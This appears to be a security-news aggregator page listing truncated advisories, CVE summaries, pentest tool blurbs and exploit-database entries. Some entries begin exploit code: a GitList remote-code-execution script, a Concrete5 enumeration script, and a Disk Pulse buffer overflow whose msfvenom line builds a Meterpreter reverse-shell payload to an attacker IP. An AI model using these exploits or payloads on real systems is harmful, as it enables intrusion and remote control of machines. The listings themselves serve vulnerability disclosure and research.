openSUSE: Security Advisory for python (openSUSE-SU-2018:1415-1)

The remote host is missing an update for the Copyright C 2018 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

KB4073065: Surface guidance to protect against silicon-based microarchitectural and speculative execution side-channel vulnerabilities

None None...

GitList 0.6 Remote Code Execution

python import requests from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import urlparse import urllib import threading import time import os import re url = 'http://192.168.1.1/gitlist/' command = 'id' yourip = '192.168.1.100' yourport = 8001 print "GitList 0.6 Unauthenticated RCE"...

VLC Media Player/Kodi/PopcornTime Memory Corruption

""" VLC Media Player/Kodi/PopcornTime 'Red Chimera' 2.2.5 Memory Corruption PoC Author: SivertPL [email protected] CVE: CVE-2017-8311 Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitleplugin.dll. This is the Proof of Concept of the reverse engineered heap corruption vulnerability...

ReconCat - Tool To Fetch Archive Url Snapshots From Archive.org

A small Php application to fetch archive url snapshots from archive.org. using it you can fetch complete list of snapshot urls of any year or complete list of all years possible. Made Specially for penetration testing purpose. This application is powered byWMB-Scrapper Installation Clone this...

XenForo 2 CSS Loader Denial Of Service

Exploit Title: XenForo CSS Loader DoS Google Dork: intext:"Forum software by XenForoaC/" inurl:css.php ext:php Date: 22-03-18 Exploit Author: LockedByte Vendor Homepage: https://xenforo.com/ Software Link: https://xenforo.com/help/installation/ Version: XenForo 2 Tested on: Linux...

Arjun - Tool To Find Hidden GET & POST Parameters

Arjun is a python script for finding hidden GET & POST parameters using regex and bruteforce. Dependencies requests threading Usages Here's how you can scan a webpage for get parameters python arjun.py -u http://example.com/index.php --get For POST, just use the --post flag. To specify the number...

Concrete5 8.3.0 - Username Comments Enumeration

Concrete5 8.3.0 - Username Comments Enumeration !/usr/bin/env python3 Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key IDOR CVE-2017-18195 Chapman R3naissance Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from tabulate impo...

Concrete5 Username / Comments Enumeration

!/usr/bin/env python3 Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key IDOR CVE-2017-18195 Chapman R3naissance Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from tabulate import tabulate import argparse import requests impo...

[SECURITY] Fedora 27 Update: suricata-4.0.4-1.fc27

The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field. This new Engine supports Multi-threading, Automatic...

CVE-2018-1000030

CVE-2018-1000030 : The Python 2.7.14 heap-security issue is described as a Heap-Buffer-Overflow and Heap-Use-After-Free arising when multiple threads handle large data, caused by a race condition between buffer sizing and writes. Older Python 2.7.x versions may also be vulnerable; the risk is con...

Blazy - Modern Login Bruteforcer Which Also Tests For CSRF, Clickjacking, Cloudflare and WAF

Blazy is a modern login page bruteforcer. Features Easy target selections Smart form and error detection CSRF and Clickjacking Scanner Cloudflare and WAF Detector 90% accurate results Checks for login bypass via SQL injection Multi-threading 100% accurate results Better form detection and...

Breacher - Tool To Find Admin Login Pages And EAR Vulnerabilites

A script to find admin login pages and EAR vulnerabilites. Features Multi-threading on demand Big path list 798 paths Supports php, asp and html extensions Checks for potential EAR vulnerabilites Checks for robots.txt Support for custom patns Usages Check all paths with php extension python...

CVE-2017-11059

In Android for MSM, Firefox OS for MSM, QRD Android, with all Android releases from CAF using the Linux kernel, setting the HMAC key by different threads during SHA operations may potentially lead to a buffer overflow...

Disk Pulse Enterprise 10.0.12 GET Buffer Overflow

Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...

Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)

Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow SEH Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp...

Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service

Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Oracle Java JDK/JRE 1.8.0.131 and previous versions packages and Apache Xerces 2.11.0 The vulnerabilities are: Oracle JDK/JRE Concurrency-Related Denial of Service java.net.URLConnection with no...

python security and bug fix update

2.7.5-58.0.1 - Add Oracle Linux distribution in platform.py orabug 20812544 2.7.5-58 - Set stream to None in case an open fails. Resolves: rhbz1432003 2.7.5-57 - Fix implicit declaration warnings of functions added by patches 147 and 265 Resolves: rhbz1441237 2.7.5-56 - Fix shutil.makearchive...

SteelCon: Mahkra ni Orroz

I recently gave a talk at Sheffield's SteelCon, a huge security event spread over a few days with no end of interesting activities taking place. My presentation, called Makhra ni Orroz, is a good 45 minutes of non stop talking and pictures and things. It's also a bit different in terms of what I...

Microsoft .NET Privilege Escalation Vulnerability

Exploit for windows platform in category local exploits Hi @ll, all versions of .NET Framework support to load a COM object as code profiler, enabled via two or three environment variables. From | A profiler DLL is an unmanaged DLL that runs as part of the | common language runtime execution...